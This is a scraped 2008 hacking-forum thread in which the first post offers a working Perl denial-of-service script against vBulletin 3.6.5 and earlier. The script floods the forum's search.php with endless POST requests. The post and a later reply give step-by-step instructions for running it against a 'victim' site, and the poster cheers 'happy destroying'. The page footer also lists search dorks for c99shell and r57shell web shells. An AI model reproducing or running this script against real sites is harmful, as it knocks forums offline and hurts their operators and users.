BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack (2) Thread Tools Display Modes
Old 06-16-2008   2 links from elsewhere to this Post. Click to view. #1 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 147 Times in 92 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Talking New !! Vbulletin Exploit [All Versions]

Code:
# VBulletin DoS Exploit

# 

# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works;) 

# 

# important => Make sure that Image Verification in (search.php) is NOT Enabled.

# It works on 3.6.5 and prior [all] !

#

#Perl Script

use Socket;

if (@ARGV < 2) { &usage; }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)

{

$user="h4x0r".$rand.$i;

$data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";

$len = length $data;

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

               "Accept: */*\r\n".

               "Accept-Language: en-gb\r\n".

               "Content-Type: application/x-www-form-urlencoded\r\n".

               "Accept-Encoding: gzip, deflate\r\n".

               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

               "Host: $host\r\n".

               "Content-Length: $len\r\n".

               "Connection: Keep-Alive\r\n".

               "Cache-Control: no-cache\r\n\r\n".

 "$data";

     my $port = "80";

     my $proto = getprotobyname('tcp');





     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

     send(SOCKET,"$foo", 0);

     syswrite STDOUT, "|";

}

print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0  \n";

print "\tex: $0 127.0.0.1 /forum/\n";

print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";

exit();

};
That perl script. u must have perl programing on your pc. Download below.

Code:
http://www.activestate.com/ActivePerl/
install active perl if ur using windows. save that file example.pl. open cmd and taip perl example.pl mean host the victim dna dir of the forum
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Old 06-17-2008   #2 (permalink)
Respected Member
 
Spore's Avatar
 
Join Date: Jun 2008

Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34 Spore has a spectacular aura aboutSpore has a spectacular aura aboutSpore has a spectacular aura about
Default

wahhhhhhhhh digi u r a superstar
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high.
Spore is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-17-2008   #3 (permalink)
Senior Member
 
Join Date: Apr 2008

Location: Indore
Age: 15
Posts: 235
Thanks: 0
Thanked 2 Times in 2 Posts
Rep Power: 30 $$$Unleashed$$$ is a glorious beacon of light$$$Unleashed$$$ is a glorious beacon of light$$$Unleashed$$$ is a glorious beacon of light$$$Unleashed$$$ is a glorious beacon of light$$$Unleashed$$$ is a glorious beacon of light
Default

Error on 95
:(
__________________
I am the best!!!

Dont forget to add my reps!!!
$$$Unleashed$$$ is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-17-2008   #4 (permalink)
Badhackerz
 
RampageX11's Avatar
 
Join Date: Apr 2008

Location: Detention cell
Posts: 619
Thanks: 90
Thanked 53 Times in 21 Posts
Rep Power: 54 RampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond repute
Default

how to use it digi post some screen shots
__________________
selling



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
RampageX11 is online now  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-17-2008   #5 (permalink)
Founder
 
The Boss's Avatar
 
Join Date: Mar 2006

Posts: 7,384
Thanks: 130
Thanked 205 Times in 130 Posts
Rep Power: 276 The Boss has a reputation beyond repute
The Boss has a reputation beyond reputeThe Boss has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to The Boss
Default

Quote:
Originally Posted by RampageX11 View Post
how to use it digi post some screen shots
download perl provided in the post

copy the above coded exploit in a notepad file and save it as anyname.pl in your perl/bin folder

now open command prompt and run the explot fine via giving correct path i.e c:/perl/bin/anyname.pl

i hope it helps

Thanks
The Boss is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-17-2008   #6 (permalink)
Badhackerz
 
RampageX11's Avatar
 
Join Date: Apr 2008

Location: Detention cell
Posts: 619
Thanks: 90
Thanked 53 Times in 21 Posts
Rep Power: 54 RampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond repute
Default

but where to enter site forum url
__________________
selling



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
RampageX11 is online now  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-19-2008   #7 (permalink)
Senior Member
 
TANTRIK's Avatar
 
Join Date: Mar 2008

Posts: 163
Thanks: 2
Thanked 5 Times in 3 Posts
Rep Power: 34 TANTRIK is a splendid one to beholdTANTRIK is a splendid one to beholdTANTRIK is a splendid one to beholdTANTRIK is a splendid one to beholdTANTRIK is a splendid one to beholdTANTRIK is a splendid one to beholdTANTRIK is a splendid one to behold
Send a message via Yahoo to TANTRIK
Default

the exploit crashes the whole board ??????????

or u kidding

__________________
THE WORLD IS NOT ENOUGH

i m the_bond

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
TANTRIK is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-19-2008   #8 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 147 Times in 92 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Default

Quote:
Originally Posted by the_bond View Post
the exploit crashes the whole board ??????????

or u kidding

it does destoy the whole board i have tested so have my mates. happy destorying
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-19-2008   #9 (permalink)
Respected Member
 
Spore's Avatar
 
Join Date: Jun 2008

Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34 Spore has a spectacular aura aboutSpore has a spectacular aura aboutSpore has a spectacular aura about
Default

im haveing problems useing this?

need some help
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high.
Spore is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-20-2008   #10 (permalink)
Respected Member
 
Spore's Avatar
 
Join Date: Jun 2008

Location: BHZ Forum
Posts: 775
Thanks: 0
Thanked 3 Times in 3 Posts
Rep Power: 34 Spore has a spectacular aura aboutSpore has a spectacular aura aboutSpore has a spectacular aura about
Default

how long should it take?
__________________
signatures can either have text or image. text should not be more than 3 lines (font-size : 2) and image cannot be more than 50px high.
Spore is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks

LinkBacks (?)
LinkBack to this Thread: http://www.badhackerz.com/exploit-codes/10597-new-vbulletin-exploit-all-versions.html
Posted By For Type Date
Digg - New !! Vbulletin Exploit [All Versions] This thread Refback 06-20-2008 08:03 AM
Badhackerz... Ethical hackers - Powered by vBulletin This thread Refback 06-17-2008 02:43 AM


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod) Armageddon Exploit Codes 2 2 Days Ago 07:23 AM
Vbulletin Latest exploit not mine RampageX11 Exploit Codes 8 1 Week Ago 02:23 PM
The Egyptians {ALL VERSIONS} Insurrection Sony Ericsson File Downloads 0 08-04-2008 02:09 PM
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit Chota_boss Exploit Codes 0 08-02-2008 03:16 PM

These are the 100 most searched terms
Search Cloud
"black and white 2" "megaupload" (intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack ambit250 bad hackerz badgewinners.com badhackerz badhackerz.com c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm dhcp sniffer evan poczik evllp.dll free tamil sex stories idm 512 imageshack clone infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader jdownloader.exe logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rosetta stone rapidshare rosetta stone romanian rosetta stone update rosetta stone v3 rapidshare safe-mode: off (not secure) drwxrwxrwx c99shell shila pandit sigma 1.7 softjtag tamil sex stories tamil sex story tamilsexstories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 03:32 AM.


Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios